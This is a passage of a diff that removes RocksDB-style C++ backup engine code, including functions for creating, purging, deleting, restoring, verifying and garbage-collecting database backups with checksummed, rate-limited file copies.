-    if (options_.max_valid_backups_to_open == 0) {
-      valid_backups_to_open = INT_MAX;
-    } else {
-      valid_backups_to_open = options_.max_valid_backups_to_open;
-    }
-    for (auto backup_iter = backups_.rbegin();
-         backup_iter != backups_.rend() && valid_backups_to_open > 0;
-         ++backup_iter) {
-      InsertPathnameToSizeBytes(
-          GetAbsolutePath(GetPrivateFileRel(backup_iter->first)), backup_env_,
-          &abs_path_to_size);
-      Status s = backup_iter->second->LoadFromFile(options_.backup_dir,
-                                                   abs_path_to_size);
-      if (s.IsCorruption()) {
-        ROCKS_LOG_INFO(options_.info_log, "Backup %u corrupted -- %s",
-                       backup_iter->first, s.ToString().c_str());
-        corrupt_backups_.insert(
-            std::make_pair(backup_iter->first,
-                           std::make_pair(s, std::move(backup_iter->second))));
-      } else if (!s.ok()) {
-        // Distinguish corruption errors from errors in the backup Env.
-        // Errors in the backup Env (i.e., this code path) will cause Open() to
-        // fail, whereas corruption errors would not cause Open() failures.
-        return s;
-      } else {
-        ROCKS_LOG_INFO(options_.info_log, "Loading backup %" PRIu32 " OK:\n%s",
-                       backup_iter->first,
-                       backup_iter->second->GetInfoString().c_str());
-        latest_backup_id_ = std::max(latest_backup_id_, backup_iter->first);
-        --valid_backups_to_open;
-      }
-    }
-
-    for (const auto& corrupt : corrupt_backups_) {
-      backups_.erase(backups_.find(corrupt.first));
-    }
-    // erase the backups before max_valid_backups_to_open
-    int num_unopened_backups;
-    if (options_.max_valid_backups_to_open == 0) {
-      num_unopened_backups = 0;
-    } else {
-      num_unopened_backups =
-          std::max(0, static_cast<int>(backups_.size()) -
-                          options_.max_valid_backups_to_open);
-    }
-    for (int i = 0; i < num_unopened_backups; ++i) {
-      assert(backups_.begin()->second->Empty());
-      backups_.erase(backups_.begin());
-    }
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Latest backup is %u", latest_backup_id_);
-
-  // set up threads perform copies from files_to_copy_or_create_ in the
-  // background
-  for (int t = 0; t < options_.max_background_operations; t++) {
-    threads_.emplace_back([this]() {
-#if defined(_GNU_SOURCE) && defined(__GLIBC_PREREQ)
-#if __GLIBC_PREREQ(2, 12)
-      pthread_setname_np(pthread_self(), "backup_engine");
-#endif
-#endif
-      CopyOrCreateWorkItem work_item;
-      while (files_to_copy_or_create_.read(work_item)) {
-        CopyOrCreateResult result;
-        result.status = CopyOrCreateFile(
-            work_item.src_path, work_item.dst_path, work_item.contents,
-            work_item.src_env, work_item.dst_env, work_item.sync,
-            work_item.rate_limiter, &result.size, &result.checksum_value,
-            work_item.size_limit, work_item.progress_callback);
-        work_item.result.set_value(std::move(result));
-      }
-    });
-  }
-  ROCKS_LOG_INFO(options_.info_log, "Initialized BackupEngine");
-
-  return Status::OK();
-}
-
-Status BackupEngineImpl::CreateNewBackupWithMetadata(
-    DB* db, const std::string& app_metadata, bool flush_before_backup,
-    std::function<void()> progress_callback) {
-  assert(initialized_);
-  assert(!read_only_);
-  if (app_metadata.size() > kMaxAppMetaSize) {
-    return Status::InvalidArgument("App metadata too large");
-  }
-
-  BackupID new_backup_id = latest_backup_id_ + 1;
-
-  assert(backups_.find(new_backup_id) == backups_.end());
-  auto ret = backups_.insert(
-      std::make_pair(new_backup_id, unique_ptr<BackupMeta>(new BackupMeta(
-                                        GetBackupMetaFile(new_backup_id),
-                                        &backuped_file_infos_, backup_env_))));
-  assert(ret.second == true);
-  auto& new_backup = ret.first->second;
-  new_backup->RecordTimestamp();
-  new_backup->SetAppMetadata(app_metadata);
-
-  auto start_backup = backup_env_-> NowMicros();
-
-  ROCKS_LOG_INFO(options_.info_log,
-                 "Started the backup process -- creating backup %u",
-                 new_backup_id);
-
-  auto private_tmp_dir = GetAbsolutePath(GetPrivateFileRel(new_backup_id, true));
-  Status s = backup_env_->FileExists(private_tmp_dir);
-  if (s.ok()) {
-    // maybe last backup failed and left partial state behind, clean it up
-    s = GarbageCollect();
-  } else if (s.IsNotFound()) {
-    // normal case, the new backup's private dir doesn't exist yet
-    s = Status::OK();
-  }
-  if (s.ok()) {
-    s = backup_env_->CreateDir(private_tmp_dir);
-  }
-
-  RateLimiter* rate_limiter = options_.backup_rate_limiter.get();
-  if (rate_limiter) {
-    copy_file_buffer_size_ = rate_limiter->GetSingleBurstBytes();
-  }
-
-  // A set into which we will insert the dst_paths that are calculated for live
-  // files and live WAL files.
-  // This is used to check whether a live files shares a dst_path with another
-  // live file.
-  std::unordered_set<std::string> live_dst_paths;
-
-  std::vector<BackupAfterCopyOrCreateWorkItem> backup_items_to_finish;
-  // Add a CopyOrCreateWorkItem to the channel for each live file
-  db->DisableFileDeletions();
-  if (s.ok()) {
-    CheckpointImpl checkpoint(db);
-    uint64_t sequence_number = 0;
-    s = checkpoint.CreateCustomCheckpoint(
-        db->GetDBOptions(),
-        [&](const std::string& src_dirname, const std::string& fname,
-            FileType) {
-          // custom checkpoint will switch to calling copy_file_cb after it sees
-          // NotSupported returned from link_file_cb.
-          return Status::NotSupported();
-        } /* link_file_cb */,
-        [&](const std::string& src_dirname, const std::string& fname,
-            uint64_t size_limit_bytes, FileType type) {
-          if (type == kLogFile && !options_.backup_log_files) {
-            return Status::OK();
-          }
-          Log(options_.info_log, "add file for backup %s", fname.c_str());
-          uint64_t size_bytes = 0;
-          Status st;
-          if (type == kTableFile) {
-            st = db_env_->GetFileSize(src_dirname + fname, &size_bytes);
-          }
-          if (st.ok()) {
-            st = AddBackupFileWorkItem(
-                live_dst_paths, backup_items_to_finish, new_backup_id,
-                options_.share_table_files && type == kTableFile, src_dirname,
-                fname, rate_limiter, size_bytes, size_limit_bytes,
-                options_.share_files_with_checksum && type == kTableFile,
-                progress_callback);
-          }
-          return st;
-        } /* copy_file_cb */,
-        [&](const std::string& fname, const std::string& contents, FileType) {
-          Log(options_.info_log, "add file for backup %s", fname.c_str());
-          return AddBackupFileWorkItem(
-              live_dst_paths, backup_items_to_finish, new_backup_id,
-              false /* shared */, "" /* src_dir */, fname, rate_limiter,
-              contents.size(), 0 /* size_limit */, false /* shared_checksum */,
-              progress_callback, contents);
-        } /* create_file_cb */,
-        &sequence_number, flush_before_backup ? 0 : port::kMaxUint64);
-    if (s.ok()) {
-      new_backup->SetSequenceNumber(sequence_number);
-    }
-  }
-  ROCKS_LOG_INFO(options_.info_log, "add files for backup done, wait finish.");
-  Status item_status;
-  for (auto& item : backup_items_to_finish) {
-    item.result.wait();
-    auto result = item.result.get();
-    item_status = result.status;
-    if (item_status.ok() && item.shared && item.needed_to_copy) {
-      item_status = item.backup_env->RenameFile(item.dst_path_tmp,
-                                                item.dst_path);
-    }
-    if (item_status.ok()) {
-      item_status = new_backup.get()->AddFile(
-              std::make_shared<FileInfo>(item.dst_relative,
-                                         result.size,
-                                         result.checksum_value));
-    }
-    if (!item_status.ok()) {
-      s = item_status;
-    }
-  }
-
-  // we copied all the files, enable file deletions
-  db->EnableFileDeletions(false);
-
-  if (s.ok()) {
-    // move tmp private backup to real backup folder
-    ROCKS_LOG_INFO(
-        options_.info_log,
-        "Moving tmp backup directory to the real one: %s -> %s\n",
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, true)).c_str(),
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)).c_str());
-    s = backup_env_->RenameFile(
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, true)),  // tmp
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)));
-  }
-
-  auto backup_time = backup_env_->NowMicros() - start_backup;
-
-  if (s.ok()) {
-    // persist the backup metadata on the disk
-    s = new_backup->StoreToFile(options_.sync);
-  }
-  if (s.ok() && options_.sync) {
-    unique_ptr<Directory> backup_private_directory;
-    backup_env_->NewDirectory(
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)),
-        &backup_private_directory);
-    if (backup_private_directory != nullptr) {
-      backup_private_directory->Fsync();
-    }
-    if (private_directory_ != nullptr) {
-      private_directory_->Fsync();
-    }
-    if (meta_directory_ != nullptr) {
-      meta_directory_->Fsync();
-    }
-    if (shared_directory_ != nullptr) {
-      shared_directory_->Fsync();
-    }
-    if (backup_directory_ != nullptr) {
-      backup_directory_->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    backup_statistics_.IncrementNumberSuccessBackup();
-  }
-  if (!s.ok()) {
-    backup_statistics_.IncrementNumberFailBackup();
-    // clean all the files we might have created
-    ROCKS_LOG_INFO(options_.info_log, "Backup failed -- %s",
-                   s.ToString().c_str());
-    ROCKS_LOG_INFO(options_.info_log, "Backup Statistics %s\n",
-                   backup_statistics_.ToString().c_str());
-    // delete files that we might have already written
-    DeleteBackup(new_backup_id);
-    GarbageCollect();
-    return s;
-  }
-
-  // here we know that we succeeded and installed the new backup
-  // in the LATEST_BACKUP file
-  latest_backup_id_ = new_backup_id;
-  ROCKS_LOG_INFO(options_.info_log, "Backup DONE. All is good");
-
-  // backup_speed is in byte/second
-  double backup_speed = new_backup->GetSize() / (1.048576 * backup_time);
-  ROCKS_LOG_INFO(options_.info_log, "Backup number of files: %u",
-                 new_backup->GetNumberFiles());
-  char human_size[16];
-  AppendHumanBytes(new_backup->GetSize(), human_size, sizeof(human_size));
-  ROCKS_LOG_INFO(options_.info_log, "Backup size: %s", human_size);
-  ROCKS_LOG_INFO(options_.info_log, "Backup time: %" PRIu64 " microseconds",
-                 backup_time);
-  ROCKS_LOG_INFO(options_.info_log, "Backup speed: %.3f MB/s", backup_speed);
-  ROCKS_LOG_INFO(options_.info_log, "Backup Statistics %s",
-                 backup_statistics_.ToString().c_str());
-  return s;
-}
-
-Status BackupEngineImpl::PurgeOldBackups(uint32_t num_backups_to_keep) {
-  assert(initialized_);
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Purging old backups, keeping %u",
-                 num_backups_to_keep);
-  std::vector<BackupID> to_delete;
-  auto itr = backups_.begin();
-  while ((backups_.size() - to_delete.size()) > num_backups_to_keep) {
-    to_delete.push_back(itr->first);
-    itr++;
-  }
-  for (auto backup_id : to_delete) {
-    auto s = DeleteBackup(backup_id);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-Status BackupEngineImpl::DeleteBackup(BackupID backup_id) {
-  assert(initialized_);
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Deleting backup %u", backup_id);
-  auto backup = backups_.find(backup_id);
-  if (backup != backups_.end()) {
-    auto s = backup->second->Delete();
-    if (!s.ok()) {
-      return s;
-    }
-    backups_.erase(backup);
-  } else {
-    auto corrupt = corrupt_backups_.find(backup_id);
-    if (corrupt == corrupt_backups_.end()) {
-      return Status::NotFound("Backup not found");
-    }
-    auto s = corrupt->second.second->Delete();
-    if (!s.ok()) {
-      return s;
-    }
-    corrupt_backups_.erase(corrupt);
-  }
-
-  std::vector<std::string> to_delete;
-  for (auto& itr : backuped_file_infos_) {
-    if (itr.second->refs == 0) {
-      Status s = backup_env_->DeleteFile(GetAbsolutePath(itr.first));
-      ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s", itr.first.c_str(),
-                     s.ToString().c_str());
-      to_delete.push_back(itr.first);
-    }
-  }
-  for (auto& td : to_delete) {
-    backuped_file_infos_.erase(td);
-  }
-
-  // take care of private dirs -- GarbageCollect() will take care of them
-  // if they are not empty
-  std::string private_dir = GetPrivateFileRel(backup_id);
-  Status s = backup_env_->DeleteDir(GetAbsolutePath(private_dir));
-  ROCKS_LOG_INFO(options_.info_log, "Deleting private dir %s -- %s",
-                 private_dir.c_str(), s.ToString().c_str());
-  return Status::OK();
-}
-
-void BackupEngineImpl::GetBackupInfo(std::vector<BackupInfo>* backup_info) {
-  assert(initialized_);
-  backup_info->reserve(backups_.size());
-  for (auto& backup : backups_) {
-    if (!backup.second->Empty()) {
-      backup_info->push_back(BackupInfo(
-          backup.first, backup.second->GetTimestamp(), backup.second->GetSize(),
-          backup.second->GetNumberFiles(), backup.second->GetAppMetadata()));
-    }
-  }
-}
-
-void
-BackupEngineImpl::GetCorruptedBackups(
-    std::vector<BackupID>* corrupt_backup_ids) {
-  assert(initialized_);
-  corrupt_backup_ids->reserve(corrupt_backups_.size());
-  for (auto& backup : corrupt_backups_) {
-    corrupt_backup_ids->push_back(backup.first);
-  }
-}
-
-Status BackupEngineImpl::RestoreDBFromBackup(
-    BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-    const RestoreOptions& restore_options) {
-  assert(initialized_);
-  auto corrupt_itr = corrupt_backups_.find(backup_id);
-  if (corrupt_itr != corrupt_backups_.end()) {
-    return corrupt_itr->second.first;
-  }
-  auto backup_itr = backups_.find(backup_id);
-  if (backup_itr == backups_.end()) {
-    return Status::NotFound("Backup not found");
-  }
-  auto& backup = backup_itr->second;
-  if (backup->Empty()) {
-    return Status::NotFound("Backup not found");
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Restoring backup id %u\n", backup_id);
-  ROCKS_LOG_INFO(options_.info_log, "keep_log_files: %d\n",
-                 static_cast<int>(restore_options.keep_log_files));
-
-  // just in case. Ignore errors
-  db_env_->CreateDirIfMissing(db_dir);
-  db_env_->CreateDirIfMissing(wal_dir);
-
-  if (restore_options.keep_log_files) {
-    // delete files in db_dir, but keep all the log files
-    DeleteChildren(db_dir, 1 << kLogFile);
-    // move all the files from archive dir to wal_dir
-    std::string archive_dir = ArchivalDirectory(wal_dir);
-    std::vector<std::string> archive_files;
-    db_env_->GetChildren(archive_dir, &archive_files);  // ignore errors
-    for (const auto& f : archive_files) {
-      uint64_t number;
-      FileType type;
-      bool ok = ParseFileName(f, &number, &type);
-      if (ok && type == kLogFile) {
-        ROCKS_LOG_INFO(options_.info_log,
-                       "Moving log file from archive/ to wal_dir: %s",
-                       f.c_str());
-        Status s =
-            db_env_->RenameFile(archive_dir + "/" + f, wal_dir + "/" + f);
-        if (!s.ok()) {
-          // if we can't move log file from archive_dir to wal_dir,
-          // we should fail, since it might mean data loss
-          return s;
-        }
-      }
-    }
-  } else {
-    DeleteChildren(wal_dir);
-    DeleteChildren(ArchivalDirectory(wal_dir));
-    DeleteChildren(db_dir);
-  }
-
-  RateLimiter* rate_limiter = options_.restore_rate_limiter.get();
-  if (rate_limiter) {
-    copy_file_buffer_size_ = rate_limiter->GetSingleBurstBytes();
-  }
-  Status s;
-  std::vector<RestoreAfterCopyOrCreateWorkItem> restore_items_to_finish;
-  for (const auto& file_info : backup->GetFiles()) {
-    const std::string &file = file_info->filename;
-    std::string dst;
-    // 1. extract the filename
-    size_t slash = file.find_last_of('/');
-    // file will either be shared/<file>, shared_checksum/<file_crc32_size>
-    // or private/<number>/<file>
-    assert(slash != std::string::npos);
-    dst = file.substr(slash + 1);
-
-    // if the file was in shared_checksum, extract the real file name
-    // in this case the file is <number>_<checksum>_<size>.<type>
-    if (file.substr(0, slash) == GetSharedChecksumDirRel()) {
-      dst = GetFileFromChecksumFile(dst);
-    }
-
-    // 2. find the filetype
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(dst, &number, &type);
-    if (!ok) {
-      return Status::Corruption("Backup corrupted");
-    }
-    // 3. Construct the final path
-    // kLogFile lives in wal_dir and all the rest live in db_dir
-    dst = ((type == kLogFile) ? wal_dir : db_dir) +
-      "/" + dst;
-
-    ROCKS_LOG_INFO(options_.info_log, "Restoring %s to %s\n", file.c_str(),
-                   dst.c_str());
-    CopyOrCreateWorkItem copy_or_create_work_item(
-        GetAbsolutePath(file), dst, "" /* contents */, backup_env_, db_env_,
-        false, rate_limiter, 0 /* size_limit */);
-    RestoreAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        copy_or_create_work_item.result.get_future(),
-        file_info->checksum_value);
-    files_to_copy_or_create_.write(std::move(copy_or_create_work_item));
-    restore_items_to_finish.push_back(
-        std::move(after_copy_or_create_work_item));
-  }
-  Status item_status;
-  for (auto& item : restore_items_to_finish) {
-    item.result.wait();
-    auto result = item.result.get();
-    item_status = result.status;
-    // Note: It is possible that both of the following bad-status cases occur
-    // during copying. But, we only return one status.
-    if (!item_status.ok()) {
-      s = item_status;
-      break;
-    } else if (item.checksum_value != result.checksum_value) {
-      s = Status::Corruption("Checksum check failed");
-      break;
-    }
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Restoring done -- %s\n",
-                 s.ToString().c_str());
-  return s;
-}
-
-Status BackupEngineImpl::VerifyBackup(BackupID backup_id) {
-  assert(initialized_);
-  auto corrupt_itr = corrupt_backups_.find(backup_id);
-  if (corrupt_itr != corrupt_backups_.end()) {
-    return corrupt_itr->second.first;
-  }
-
-  auto backup_itr = backups_.find(backup_id);
-  if (backup_itr == backups_.end()) {
-    return Status::NotFound();
-  }
-
-  auto& backup = backup_itr->second;
-  if (backup->Empty()) {
-    return Status::NotFound();
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Verifying backup id %u\n", backup_id);
-
-  std::unordered_map<std::string, uint64_t> curr_abs_path_to_size;
-  for (const auto& rel_dir : {GetPrivateFileRel(backup_id), GetSharedFileRel(),
-                              GetSharedFileWithChecksumRel()}) {
-    const auto abs_dir = GetAbsolutePath(rel_dir);
-    InsertPathnameToSizeBytes(abs_dir, backup_env_, &curr_abs_path_to_size);
-  }
-
-  for (const auto& file_info : backup->GetFiles()) {
-    const auto abs_path = GetAbsolutePath(file_info->filename);
-    if (curr_abs_path_to_size.find(abs_path) == curr_abs_path_to_size.end()) {
-      return Status::NotFound("File missing: " + abs_path);
-    }
-    if (file_info->size != curr_abs_path_to_size[abs_path]) {
-      return Status::Corruption("File corrupted: " + abs_path);
-    }
-  }
-  return Status::OK();
-}
-
-Status BackupEngineImpl::CopyOrCreateFile(
-    const std::string& src, const std::string& dst, const std::string& contents,
-    Env* src_env, Env* dst_env, bool sync, RateLimiter* rate_limiter,
-    uint64_t* size, uint32_t* checksum_value, uint64_t size_limit,
-    std::function<void()> progress_callback) {
-  assert(src.empty() != contents.empty());
-  Status s;
-  unique_ptr<WritableFile> dst_file;
-  unique_ptr<SequentialFile> src_file;
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  // TODO:(gzh) maybe use direct reads/writes here if possible
-  if (size != nullptr) {
-    *size = 0;
-  }
-  if (checksum_value != nullptr) {
-    *checksum_value = 0;
-  }
-
-  // Check if size limit is set. if not, set it to very big number
-  if (size_limit == 0) {
-    size_limit = std::numeric_limits<uint64_t>::max();
-  }
-
-  s = dst_env->NewWritableFile(dst, &dst_file, env_options);
-  if (s.ok() && !src.empty()) {
-    s = src_env->NewSequentialFile(src, &src_file, env_options);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<WritableFileWriter> dest_writer(
-      new WritableFileWriter(std::move(dst_file), env_options));
-  unique_ptr<SequentialFileReader> src_reader;
-  unique_ptr<char[]> buf;
-  if (!src.empty()) {
-    src_reader.reset(new SequentialFileReader(std::move(src_file)));
-    buf.reset(new char[copy_file_buffer_size_]);
-  }
-
-  Slice data;
-  uint64_t processed_buffer_size = 0;
-  do {
-    if (stop_backup_.load(std::memory_order_acquire)) {
-      return Status::Incomplete("Backup stopped");
-    }
-    if (!src.empty()) {
-      size_t buffer_to_read = (copy_file_buffer_size_ < size_limit)
-                                  ? copy_file_buffer_size_
-                                  : size_limit;
-      s = src_reader->Read(buffer_to_read, &data, buf.get());
-      processed_buffer_size += buffer_to_read;
-    } else {
-      data = contents;
-    }
-    size_limit -= data.size();
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    if (size != nullptr) {
-      *size += data.size();
-    }
-    if (checksum_value != nullptr) {
-      *checksum_value =
-          crc32c::Extend(*checksum_value, data.data(), data.size());
-    }
-    s = dest_writer->Append(data);
-    if (rate_limiter != nullptr) {
-      rate_limiter->Request(data.size(), Env::IO_LOW, nullptr /* stats */,
-                            RateLimiter::OpType::kWrite);
-    }
-    if (processed_buffer_size > options_.callback_trigger_interval_size) {
-      processed_buffer_size -= options_.callback_trigger_interval_size;
-      std::lock_guard<std::mutex> lock(byte_report_mutex_);
-      progress_callback();
-    }
-  } while (s.ok() && contents.empty() && data.size() > 0 && size_limit > 0);
-
-  if (s.ok() && sync) {
-    s = dest_writer->Sync(false);
-  }
-  if (s.ok()) {
-    s = dest_writer->Close();
-  }
-  return s;
-}
-
-// fname will always start with "/"
-Status BackupEngineImpl::AddBackupFileWorkItem(
-    std::unordered_set<std::string>& live_dst_paths,
-    std::vector<BackupAfterCopyOrCreateWorkItem>& backup_items_to_finish,
-    BackupID backup_id, bool shared, const std::string& src_dir,
-    const std::string& fname, RateLimiter* rate_limiter, uint64_t size_bytes,
-    uint64_t size_limit, bool shared_checksum,
-    std::function<void()> progress_callback, const std::string& contents) {
-  assert(!fname.empty() && fname[0] == '/');
-  assert(contents.empty() != src_dir.empty());
-
-  std::string dst_relative = fname.substr(1);
-  std::string dst_relative_tmp;
-  Status s;
-  uint32_t checksum_value = 0;
-
-  if (shared && shared_checksum) {
-    // add checksum and file length to the file name
-    s = CalculateChecksum(src_dir + fname, db_env_, size_limit,
-                          &checksum_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (size_bytes == port::kMaxUint64) {
-      return Status::NotFound("File missing: " + src_dir + fname);
-    }
-    dst_relative =
-        GetSharedFileWithChecksum(dst_relative, checksum_value, size_bytes);
-    dst_relative_tmp = GetSharedFileWithChecksumRel(dst_relative, true);
-    dst_relative = GetSharedFileWithChecksumRel(dst_relative, false);
-  } else if (shared) {
-    dst_relative_tmp = GetSharedFileRel(dst_relative, true);
-    dst_relative = GetSharedFileRel(dst_relative, false);
-  } else {
-    dst_relative_tmp = GetPrivateFileRel(backup_id, true, dst_relative);
-    dst_relative = GetPrivateFileRel(backup_id, false, dst_relative);
-  }
-  std::string dst_path = GetAbsolutePath(dst_relative);
-  std::string dst_path_tmp = GetAbsolutePath(dst_relative_tmp);
-
-  // if it's shared, we also need to check if it exists -- if it does, no need
-  // to copy it again.
-  bool need_to_copy = true;
-  // true if dst_path is the same path as another live file
-  const bool same_path =
-      live_dst_paths.find(dst_path) != live_dst_paths.end();
-
-  bool file_exists = false;
-  if (shared && !same_path) {
-    Status exist = backup_env_->FileExists(dst_path);
-    if (exist.ok()) {
-      file_exists = true;
-    } else if (exist.IsNotFound()) {
-      file_exists = false;
-    } else {
-      assert(s.IsIOError());
-      return exist;
-    }
-  }
-
-  if (!contents.empty()) {
-    need_to_copy = false;
-  } else if (shared && (same_path || file_exists)) {
-    need_to_copy = false;
-    if (shared_checksum) {
-      ROCKS_LOG_INFO(options_.info_log,
-                     "%s already present, with checksum %u and size %" PRIu64,
-                     fname.c_str(), checksum_value, size_bytes);
-    } else if (backuped_file_infos_.find(dst_relative) ==
-               backuped_file_infos_.end() && !same_path) {
-      // file already exists, but it's not referenced by any backup. overwrite
-      // the file
-      ROCKS_LOG_INFO(
-          options_.info_log,
-          "%s already present, but not referenced by any backup. We will "
-          "overwrite the file.",
-          fname.c_str());
-      need_to_copy = true;
-      backup_env_->DeleteFile(dst_path);
-    } else {
-      // the file is present and referenced by a backup
-      ROCKS_LOG_INFO(options_.info_log,
-                     "%s already present, calculate checksum", fname.c_str());
-      s = CalculateChecksum(src_dir + fname, db_env_, size_limit,
-                            &checksum_value);
-    }
-  }
-  live_dst_paths.insert(dst_path);
-
-  if (!contents.empty() || need_to_copy) {
-    ROCKS_LOG_INFO(options_.info_log, "Copying %s to %s", fname.c_str(),
-                   dst_path_tmp.c_str());
-    CopyOrCreateWorkItem copy_or_create_work_item(
-        src_dir.empty() ? "" : src_dir + fname, dst_path_tmp, contents, db_env_,
-        backup_env_, options_.sync, rate_limiter, size_limit,
-        progress_callback);
-    BackupAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        copy_or_create_work_item.result.get_future(), shared, need_to_copy,
-        backup_env_, dst_path_tmp, dst_path, dst_relative);
-    files_to_copy_or_create_.write(std::move(copy_or_create_work_item));
-    backup_items_to_finish.push_back(std::move(after_copy_or_create_work_item));
-  } else {
-    std::promise<CopyOrCreateResult> promise_result;
-    BackupAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        promise_result.get_future(), shared, need_to_copy, backup_env_,
-        dst_path_tmp, dst_path, dst_relative);
-    backup_items_to_finish.push_back(std::move(after_copy_or_create_work_item));
-    CopyOrCreateResult result;
-    result.status = s;
-    result.size = size_bytes;
-    result.checksum_value = checksum_value;
-    promise_result.set_value(std::move(result));
-  }
-  return s;
-}
-
-Status BackupEngineImpl::CalculateChecksum(const std::string& src, Env* src_env,
-                                           uint64_t size_limit,
-                                           uint32_t* checksum_value) {
-  *checksum_value = 0;
-  if (size_limit == 0) {
-    size_limit = std::numeric_limits<uint64_t>::max();
-  }
-
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_reads = false;
-
-  std::unique_ptr<SequentialFile> src_file;
-  Status s = src_env->NewSequentialFile(src, &src_file, env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<SequentialFileReader> src_reader(
-      new SequentialFileReader(std::move(src_file)));
-  std::unique_ptr<char[]> buf(new char[copy_file_buffer_size_]);
-  Slice data;
-
-  do {
-    if (stop_backup_.load(std::memory_order_acquire)) {
-      return Status::Incomplete("Backup stopped");
-    }
-    size_t buffer_to_read = (copy_file_buffer_size_ < size_limit) ?
-      copy_file_buffer_size_ : size_limit;
-    s = src_reader->Read(buffer_to_read, &data, buf.get());
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    size_limit -= data.size();
-    *checksum_value = crc32c::Extend(*checksum_value, data.data(), data.size());
-  } while (data.size() > 0 && size_limit > 0);
-
-  return s;
-}
-
-void BackupEngineImpl::DeleteChildren(const std::string& dir,
-                                      uint32_t file_type_filter) {
-  std::vector<std::string> children;
-  db_env_->GetChildren(dir, &children);  // ignore errors
-
-  for (const auto& f : children) {
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(f, &number, &type);
-    if (ok && (file_type_filter & (1 << type))) {
-      // don't delete this file
-      continue;
-    }
-    db_env_->DeleteFile(dir + "/" + f);  // ignore errors
-  }
-}
-
-Status BackupEngineImpl::InsertPathnameToSizeBytes(
-    const std::string& dir, Env* env,
-    std::unordered_map<std::string, uint64_t>* result) {
-  assert(result != nullptr);
-  std::vector<Env::FileAttributes> files_attrs;
-  Status status = env->FileExists(dir);
-  if (status.ok()) {
-    status = env->GetChildrenFileAttributes(dir, &files_attrs);
-  } else if (status.IsNotFound()) {
-    // Insert no entries can be considered success
-    status = Status::OK();
-  }
-  const bool slash_needed = dir.empty() || dir.back() != '/';
-  for (const auto& file_attrs : files_attrs) {
-    result->emplace(dir + (slash_needed ? "/" : "") + file_attrs.name,
-                    file_attrs.size_bytes);
-  }
-  return status;
-}
-
-Status BackupEngineImpl::GarbageCollect() {
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Starting garbage collection");
-
-  if (options_.share_table_files) {
-    // delete obsolete shared files
-    std::vector<std::string> shared_children;
-    {
-      std::string shared_path;
-      if (options_.share_files_with_checksum) {
-        shared_path = GetAbsolutePath(GetSharedFileWithChecksumRel());
-      } else {
-        shared_path = GetAbsolutePath(GetSharedFileRel());
-      }
-      auto s = backup_env_->FileExists(shared_path);
-      if (s.ok()) {
-        s = backup_env_->GetChildren(shared_path, &shared_children);
-      } else if (s.IsNotFound()) {
-        s = Status::OK();
-      }
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    for (auto& child : shared_children) {
-      std::string rel_fname;
-      if (options_.share_files_with_checksum) {
-        rel_fname = GetSharedFileWithChecksumRel(child);
-      } else {
-        rel_fname = GetSharedFileRel(child);
-      }
-      auto child_itr = backuped_file_infos_.find(rel_fname);
-      // if it's not refcounted, delete it
-      if (child_itr == backuped_file_infos_.end() ||
-          child_itr->second->refs == 0) {
-        // this might be a directory, but DeleteFile will just fail in that
-        // case, so we're good
-        Status s = backup_env_->DeleteFile(GetAbsolutePath(rel_fname));
-        ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s",
-                       rel_fname.c_str(), s.ToString().c_str());
-        backuped_file_infos_.erase(rel_fname);
-      }
-    }
-  }
-
-  // delete obsolete private files
-  std::vector<std::string> private_children;
-  {
-    auto s = backup_env_->GetChildren(GetAbsolutePath(GetPrivateDirRel()),
-                                      &private_children);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  for (auto& child : private_children) {
-    BackupID backup_id = 0;
-    bool tmp_dir = child.find(".tmp") != std::string::npos;
-    sscanf(child.c_str(), "%u", &backup_id);
-    if (!tmp_dir &&  // if it's tmp_dir, delete it
-        (backup_id == 0 || backups_.find(backup_id) != backups_.end())) {
-      // it's either not a number or it's still alive. continue
-      continue;
-    }
-    // here we have to delete the dir and all its children
-    std::string full_private_path =
-        GetAbsolutePath(GetPrivateFileRel(backup_id, tmp_dir));
-    std::vector<std::string> subchildren;
-    backup_env_->GetChildren(full_private_path, &subchildren);
-    for (auto& subchild : subchildren) {
-      Status s = backup_env_->DeleteFile(full_private_path + subchild);
-      ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s",
-                     (full_private_path + subchild).c_str(),
-                     s.ToString().c_str());
-    }
-    // finally delete the private dir
-    Status s = backup_env_->DeleteDir(full_private_path);
-    ROCKS_LOG_INFO(options_.info_log, "Deleting dir %s -- %s",
-                   full_private_path.c_str(), s.ToString().c_str());
-  }
-
-  return Status::OK();
-}
-
-// ------- BackupMeta class --------
-
-Status BackupEngineImpl::BackupMeta::AddFile(
-    std::shared_ptr<FileInfo> file_info) {
-  auto itr = file_infos_->find(file_info->filename);
-  if (itr == file_infos_->end()) {
-    auto ret = file_infos_->insert({file_info->filename, file_info});
-    if (ret.second) {
-      itr = ret.first;
-      itr->second->refs = 1;
-    } else {
-      // if this happens, something is seriously wrong
